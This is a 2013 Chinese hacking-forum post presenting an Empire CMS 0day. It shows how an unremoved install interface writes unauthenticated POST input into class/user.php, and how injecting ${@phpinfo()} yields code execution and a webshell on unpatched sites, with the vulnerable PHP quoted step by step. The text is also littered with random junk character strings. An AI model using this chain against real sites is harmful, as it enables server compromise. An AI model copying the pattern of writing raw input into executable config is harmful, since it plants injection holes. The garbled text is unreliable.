找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2307|回复: 0
打印 上一主题 下一主题

帝国万能接口漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 09:34:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们
/ }/ s5 X* ]0 h5 ^# }1 F: R7 w' `' c- b6 W

! Q- J( x0 \5 V4 y! q7 R
这是帝国的一套下载系统 如图
1 W$ z  S' x0 N0 c; j  |" x7 hps(不需要任何账户和密码,直接写shell)

' X5 b; \+ A* D& b% ~

由于很多站是由于下载要整合discuz 等等一些论坛....# |6 }! c! l9 m8 k0 }8 e8 b( P; _* D$ Z' V


3 j  h( {% y9 Q+ Q3 @2 Y* U

而帝国他又有一个万能接口,如图

. j1 @6 e* p9 t! Y1 u; {
% _/ t) M2 o6 O# f1 q- h3 X; v# M

# W; z) v# L9 {" ~0 J7 z9 v

而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
/ i, F" b' \+ m: F2 e$ Y5 m" [+ Z
7 I+ f/ C/ E- j3 O: q当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig

1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}

复制代码

他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪, v9 v8 D$ K$ |- E7 ?8 T; ^

( o3 ^7 h, t' |$ |  r在data/fun.php中的15行$ {9 F6 A5 h; Z2 y; z+ a
6 n, z  A5 e/ z2 D* m0 V* _. v
我们可以看到这个函数

1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
9 M& A8 g- B- @# R; c
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);

复制代码

.....//省略若干
$ r) L8 S5 T% `& F! n5 `' t" `8 y* g4 }* \- a5 |! j. f
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);9 n. V) K$ ~; w: Y
: L" d/ T! z8 T8 C) w% l
他将传进来的变量进行了切割,然后赋给了$filetext: Q$ d  D3 |" j" A, y

. J8 {3 x1 o) o, ^2 v* R然后看下面

1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.');
6. }
7. @fputs($fp,$filetext);

复制代码

打开了一个class/user.php文件,然后将$filetext写入了8 p  v6 X; @( p! x, X; ^5 `  J/ c
- e3 U9 C% o# u# Z$ c1 E4 N
我们看看写入的结果,随便填一个

2 x3 D8 P3 n7 {: C4 b" M$ E9 D

, t$ Q) f+ R: a- t8 g
# s; @1 w8 D  Q) z* o2 p
, W, u, Q9 D& h% J9 c3 l$ v( Q) d# ^5 {* M2 e

, h4 k1 U$ F  m$ @0 E/ H8 I" \
7 T) m- K1 b0 \: b& B+ ~$ T0 y4 m+ |

8 e* F6 M9 @: y4 r
* Q- o5 O  _- Q" g0 d

) c+ q2 i$ S# H3 u
2 D- U; B1 I0 l5 M% I& r6 }
4 g6 e0 `8 H# W; C+ B

4 t- h' c$ \- Z' {. k2 a2 m0 Z; m6 T4 H1 I
- ~8 U) E: }* \/ l% i4 z" w* O4 `

4 C/ Z# C! ]. P/ q
. P5 w1 X2 N% s1 T* r  w
2 J/ y0 E2 t" r: t+ R& ]; }( n& J% ]) J; }' U

) A( c6 |* C- y8 f9 O

* N  K2 x  M1 ]7 E5 M8 N5 f& i, I+ |' t6 C' T# H

所以我们淫荡点,写个${@phpinfo()}试试


; m4 L& ~7 m  T; R6 j8 ?

然后访问以下class/user.php这个文件. n+ @; h3 E) n0 T  O$ O; J
日了吧

0 a2 V  A/ P2 g! {
; q8 k6 f/ n  {5 x7 e$ M

% X* u- y+ s3 r0 H% i
# R/ ]1 w- c5 v) o5 f1 J) D2 Y  X

9 i. z7 `, q2 I# v
7 ?4 k- o+ H# ?1 h5 Y+ L5 {$ d

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表